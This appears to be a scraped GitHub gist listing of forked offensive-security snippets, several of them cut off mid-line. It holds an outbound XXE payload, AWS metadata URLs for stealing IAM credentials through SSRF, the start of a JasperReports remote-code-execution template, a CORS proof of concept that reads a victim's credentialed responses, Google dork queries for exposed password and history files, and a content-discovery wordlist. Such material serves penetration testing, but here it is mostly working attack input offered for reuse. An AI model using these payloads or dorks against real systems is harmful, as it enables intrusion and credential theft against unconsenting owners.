@shahid1996
shahid1996 / XXE_payloads
Created November 15, 2018 15:12 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@shahid1996
shahid1996 / cloud_metadata.txt
Created November 29, 2018 16:54 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
@shahid1996
shahid1996 / S2_Jasper_RCE.jrxml
Created December 7, 2018 14:47 — forked from v-p-b/S2_Jasper_RCE.jrxml
JasperReports Remote Code Execution with a single .JRXML file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE jasperReport PUBLIC "-//JasperReports//DTD Report Design//EN" "http://jasperreports.sourceforge.net/dtds/jasperreport.dtd">
<jasperReport name="FirstJasper" columnCount="2" pageWidth="595" pageHeight="842" columnWidth="270" columnSpacing="15" leftMargin="20" rightMargin="20" topMargin="30" bottomMargin="30">
<style name="Arial_Normal" isDefault="true" fontName="Arial" fontSize="8" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Bold" isDefault="false" fontName="Arial" fontSize="8" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Bold" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Italic" isDefault="false" fontName="Arial" fontSize="8" isBold="false" isItalic="true" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Oblique" pdfEncoding="Cp1252" isPdfEmbedded="fa
<html>
<title>cors misconfigurations poc</title>
<!-- reflect_origin -->
<script>var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://victim.com', true);
req.withCredentials = true;
req.send('{}');
function reqListener() {
alert(this.responseText);
@shahid1996
shahid1996 / scan.py
Created February 6, 2019 04:36 — forked from rudrasingh99/scan.py
Scan multiple platforms for hosts.
#! /usr/bin/env python3
import requests
import re, os
from shodan import Shodan
datalist = []
class Binaryhost():
@shahid1996
shahid1996 / xml-attacks.md
Created March 8, 2019 09:46 — forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may not be secure against maliciously constructed data. An attacker could abuse XML features to carry out denial-of-service attacks, access local files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against an application will have to determine which XML parser is in use, and then which of the attacks listed below that parser is vulnerable to.


@shahid1996
shahid1996 / google-dorks
Created March 21, 2019 05:12 — forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@shahid1996
shahid1996 / txt.txt
Created March 21, 2019 05:12 — forked from wookiecooking/txt.txt
haha google dork searches
intitle:index.of .bash_history
intitle:index.of .sh_history
intitle:"Index of" index.html.bak
intitle:"Index of" index.php.bak
intitle:"Index of" index.jsp.bak
intitle:"Index of" ".htpasswd" htpasswd.bak
inurl:backup intitle:index.of inurl:admin
"Index of /backup"
intitle:"Index of" index.html~
intitle:"Index of" index.php~
@shahid1996
shahid1996 / google-dorks
Created March 26, 2019 08:22 — forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@shahid1996
shahid1996 / content_discovery_all.txt
Created March 28, 2019 15:27 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
`
~/
~
ים
___
__
_
---